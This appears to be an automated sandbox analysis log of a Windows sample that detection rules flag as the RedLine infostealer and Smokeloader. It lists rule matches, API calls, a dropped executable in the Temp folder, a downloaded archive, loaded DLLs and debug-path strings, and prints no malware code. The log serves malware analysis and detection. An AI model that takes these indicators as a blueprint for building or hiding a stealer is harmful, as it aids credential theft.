        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2037350432.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2037587042.0000000000756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2110000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.610e50.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: IoUNtL.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: IoUNtL.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: IoUNtL.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
        Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/11@1/2
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F4119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_00F4119F
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rarJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeMutant created: NULL
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2920
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeFile created: C:\Users\user\AppData\Local\Temp\IoUNtL.exeJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCommand line argument: 08A0_2_00413780
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe "C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe"
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe C:\Users\user\AppData\Local\Temp\IoUNtL.exe
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1556
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe C:\Users\user\AppData\Local\Temp\IoUNtL.exeJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: msvcp140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: ntvdm64.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.00000000006FE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32^ source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: _.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
        Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
        Source: Binary string: `C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
        Source: Binary string: System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004D38000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbW.: source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
